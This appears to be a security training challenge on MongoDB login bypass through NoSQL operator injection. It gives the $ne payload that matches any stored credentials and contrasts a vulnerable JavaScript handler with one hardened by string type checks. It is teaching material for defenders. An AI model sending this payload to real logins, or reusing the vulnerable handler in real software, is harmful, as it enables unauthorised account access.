Challenge 61 of 66
NoSQL Ninja
🔴 Elite
Injection
+150 XP
A MongoDB login is vulnerable to injection of the $ne (not equal) query operator. Bypass authentication by injecting query operators.
Send {"username":{"$ne":""},"password":{"$ne":""}}. Each $ne condition is true for any stored value that is not the empty string, so the query matches any non-empty credentials.
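Why the payload works and how a login handler closes the gap, as an added example that is not the challenge's own code: loginVulnerable, loginHardened, the USERS store and the small matches() stand-in for MongoDB filter evaluation are all hypothetical names constructed for illustration.

```javascript
// Constructed sample store standing in for a MongoDB users collection.
// Plaintext passwords are used only to keep the focus on the query filter;
// a real handler looks the user up by name and verifies a password hash.
const USERS = [{ username: "alice", password: "s3cret-constructed" }];

// Minimal stand-in for MongoDB filter matching: equality and $ne only.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === "object") {
      // An object value is read as a set of query operators.
      return Object.entries(cond).every(([op, val]) => {
        if (op === "$ne") return doc[field] !== val;
        throw new Error("operator not supported in this demo: " + op);
      });
    }
    return doc[field] === cond;
  });
}

function findOne(filter) {
  return USERS.find((u) => matches(u, filter)) || null;
}

// Vulnerable: parsed JSON body fields go into the filter unchanged, so
// {"$ne": ""} arrives as an object and is evaluated as an operator.
function loginVulnerable(body) {
  return findOne({ username: body.username, password: body.password });
}

// Hardened: credentials must be plain strings before they reach the query,
// so an object can never be interpreted as an operator.
function loginHardened(body) {
  const { username, password } = body || {};
  if (typeof username !== "string" || typeof password !== "string") {
    throw new TypeError("username and password must be strings");
  }
  return findOne({ username, password });
}
```

The same type check belongs on every request field that ends up in a query filter, not only on login.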